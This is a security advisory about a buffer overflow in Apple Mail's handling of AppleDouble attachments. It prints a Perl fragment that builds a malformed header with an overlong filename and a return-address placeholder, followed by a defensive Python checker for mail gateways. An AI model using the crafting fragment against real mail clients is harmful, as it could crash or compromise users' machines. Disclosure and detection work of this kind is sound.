Apple Mac OS X Mail Message Attachment Remote Buffer Overflow Vulnerability
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com

The following AppleDouble header Perl code segment will reportedly aid in creating a file capable of triggering this issue by crashing the vulnerable application:

    "\x00\x05\x16\x07". # AppleDouble Magic Number
    "\x00\x02\x00\x00". # Version 2
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler
    "\x00\x03\x00\x00". # Number of entries (3)
    "\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info'
    "\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e
    "\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10
    "\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name'
    "\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48
    "\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245
    "\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork'
    "\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d
    "\x05\x3a\x00\x00". # Length of Resource fork is 0x053a
    "\x00\x00\x00\x00". # <null> filler
    "\x00\x00\x00\x00". # <null> filler
    "A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above.

An attachment with this AppleDouble header will reportedly appear with a filename of 'AAAAAAAAAAA...mov'.

A proof-of-concept Perl exploit designed to create and send email containing an attachment sufficient to crash Apple Mail is provided by Kevin Finisterre <kf_lists@digitalmunition.com>.
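For mail-gateway or forensic triage, the header layout above can be checked before an attachment reaches a client. The following Python sketch is an added example, not code from the advisory or from Apple: it parses the AppleDouble entry table and flags a 'Real Name' entry (ID 3) whose declared length exceeds a limit, or any entry whose data runs past the end of the file. The function names, the sample files and the 31-byte limit are assumptions chosen for illustration.

```python
import struct

MAGIC = 0x00051607        # AppleDouble magic number
REAL_NAME_ID = 3          # entry ID 3 is 'Real Name'
MAX_REAL_NAME = 31        # assumed policy limit, not a value from the advisory

def build_appledouble(entries):
    """Build a constructed AppleDouble v2 file from (entry_id, data) pairs."""
    table, body, offset = b"", b"", 26 + 12 * len(entries)
    for entry_id, data in entries:
        table += struct.pack(">III", entry_id, offset, len(data))
        body += data
        offset += len(data)
    head = struct.pack(">II16sH", MAGIC, 0x00020000, b"\0" * 16, len(entries))
    return head + table + body

def check_appledouble(blob, max_real_name=MAX_REAL_NAME):
    """Return a list of findings; an empty list means nothing was flagged."""
    if len(blob) < 26:
        return ["truncated header"]
    magic, _version, _filler, count = struct.unpack_from(">II16sH", blob, 0)
    if magic != MAGIC:
        return ["not AppleDouble"]
    if 26 + 12 * count > len(blob):
        return ["entry table runs past end of file"]
    findings = []
    for i in range(count):
        entry_id, offset, length = struct.unpack_from(">III", blob, 26 + 12 * i)
        if offset + length > len(blob):
            findings.append(f"entry {entry_id}: data runs past end of file")
        if entry_id == REAL_NAME_ID and length > max_real_name:
            findings.append(f"entry {entry_id}: Real Name length {length} exceeds {max_real_name}")
    return findings

# Constructed samples: a short name, and a 245-byte name matching the length in the header above.
BENIGN = build_appledouble([(9, b"\0" * 10), (3, b"clip.mov"), (2, b"\0" * 16)])
OVERSIZED = build_appledouble([(9, b"\0" * 10), (3, b"A" * 245), (2, b"\0" * 16)])

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, check_appledouble(blob))
```

With three entries the table ends at offset 0x3e, which is why the first data offset in the advisory's header is 0x3e.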